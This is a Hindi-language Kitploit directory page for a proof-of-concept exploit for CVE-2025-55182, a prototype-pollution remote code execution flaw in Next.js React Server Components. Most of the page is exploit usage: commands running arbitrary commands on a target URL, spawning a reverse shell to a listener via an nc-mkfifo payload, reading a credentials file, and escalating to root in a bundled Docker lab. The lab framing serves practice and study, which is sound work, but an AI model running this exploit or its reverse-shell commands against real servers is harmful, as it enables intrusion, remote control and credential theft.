Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
POC_react2shell_CVE-2025-55182 — CVE-2025-55182 के लिए एक्सप्लॉइट जो प्रोटोटाइप प्रदूषण के माध्यम से Next.js React Server Components को लक्षित करता है, कमांड निष्पादन और रिवर्स शेल पेलोड के साथ रिमोट कोड निष्पादन सक्षम करता है। अभ्यास के लिए Docker लैब वातावरण शामिल है। | Kitploit
उपकरण/GitHubGitHub/nkwenti-severian-ndongtsop/poc_react2shell_cve-2025-55182
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubnkwenti-severian-ndongtsop/poc_react2shell_cve-2025-55182

POC_react2shell_CVE-2025-55182

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 के लिए एक्सप्लॉइट जो प्रोटोटाइप प्रदूषण के माध्यम से Next.js React Server Components को लक्षित करता है, कमांड निष्पादन और रिवर्स शेल पेलोड के साथ रिमोट कोड निष्पादन सक्षम करता है। अभ्यास के लिए Docker लैब वातावरण शामिल है।

रिपॉजिटरी देखेंवेबसाइट
28 महीने पहलेअभी तक समीक्षित नहीं

Next.js React सर्वर घटक RCE शोषण

CVE-2025-55182 का शोषण करता है जो प्रोटोटाइप प्रदूषण के माध्यम से रिमोट कोड निष्पादन की अनुमति देता है।

लेखक: Severian N.K.

विवरण

यह उपकरण React सर्वर घटकों का उपयोग करने वाले Next.js अनुप्रयोगों में प्रोटोटाइप प्रदूषण भेद्यता का शोषण करता है, जो रिमोट कोड निष्पादन (RCE) की ओर ले जाता है। यह प्रत्यक्ष कमांड निष्पादन और रिवर्स शेल दोनों का समर्थन करता है।

स्थापना

यह परियोजना निर्भरताओं को प्रबंधित करने के लिए Python वर्चुअल वातावरण का उपयोग करती है। पहले सुनिश्चित करें कि आपके पास Python 3 स्थापित है।

  1. वर्चुअल वातावरण सेट करें:

    root@kitploit:~
    python3 -m venv venv
    
  2. वातावरण सक्रिय करें और निर्भरताएँ स्थापित करें:

    root@kitploit:~
    source venv/bin/activate
    pip install -r requirements.txt
    

उपयोग

शोषण चलाने से पहले सुनिश्चित करें कि वर्चुअल वातावरण सक्रिय है (source venv/bin/activate)।

कमांड निष्पादन

लक्ष्य पर एकल कमांड निष्पादित करने के लिए:

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c "<COMMAND>"

उदाहरण:

root@kitploit:~
python3 exploit.py -u http://example.com -c "id"

रिवर्स शेल

लक्ष्य से रिवर्स शेल प्राप्त करने के लिए:

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -r -l <LISTENER_IP> -p <LISTENER_PORT>

उदाहरण:

root@kitploit:~
python3 exploit.py -u http://example.com -r -l 10.10.10.2 -p 9001 -P nc-mkfifo

प्रयोगशाला वातावरण

lab/ निर्देशिका में दो स्वतंत्र Docker वातावरण हैं:

  1. असुरक्षित ऐप (lab/vulnerable): पोर्ट 3000 पर चलता है।
  2. पैच किया गया ऐप (lab/patched): पोर्ट 3001 पर चलता है।

1. असुरक्षित ऐप सेटअप करें

root@kitploit:~
cd lab/vulnerable
chmod +x build.sh run.sh
./build.sh
./run.sh

पहुँचें: http://localhost:3000

2. पैच किया गया ऐप सेटअप करें

root@kitploit:~
cd lab/patched
chmod +x build.sh run.sh
./build.sh
./run.sh

पहुँचें: http://localhost:3001

3. रिवर्स शेल का परीक्षण करें

आपको अपना श्रोता IP (--lhost) और पोर्ट (--lport) निर्दिष्ट करना होगा। आप अपना Docker ब्रिज IP ip addr show docker0 (सामान्यतः 172.17.0.1) से प्राप्त कर सकते हैं।

root@kitploit:~
python exploit.py -u http://localhost:3000 -r -l 172.17.0.1 -p 6000 -P nc-mkfifo

नोट: हम -P nc-mkfifo का उपयोग कर रहे हैं क्योंकि लक्ष्य Alpine Linux चला रहा है, जिसके लिए एक विशिष्ट पेलोड प्रकार की आवश्यकता है।

चरण 2: रहस्यों तक पहुँचें

असुरक्षित कंटेनर एक गुप्त फ़ाइल उजागर करता है।

root@kitploit:~
python3 exploit.py -u http://localhost:3000 -c "cat /secret/credentials.txt"
# Output: manager:SuperSecret2025!

चरण 3: विशेषाधिकार वृद्धि

आप समझौता किए गए क्रेडेंशियल्स का उपयोग करके nextjs से root तक विशेषाधिकार बढ़ा सकते हैं।

  1. उपयोगकर्ता स्विच करें: su - manager (पासवर्ड: SuperSecret2025!)
  2. रूट बनें: sudo su (पासवर्ड: SuperSecret2025!)
  3. ध्वज प्राप्त करें:
    root@kitploit:~
    cat /root/flag.txt
    # Output: Congratulations! You have gained full control over the system!
    

संदर्भ

  • तकनीकी विश्लेषण (Gist)
  • हैंड्स-ऑन लैब (TryHackMe)

योगदान

योगदान का स्वागत है! यदि आपको कोई बग मिलता है या सुधार का विचार है, तो कृपया एक मुद्दा खोलें या पुल अनुरोध सबमिट करें।

टूल डाउनलोड करें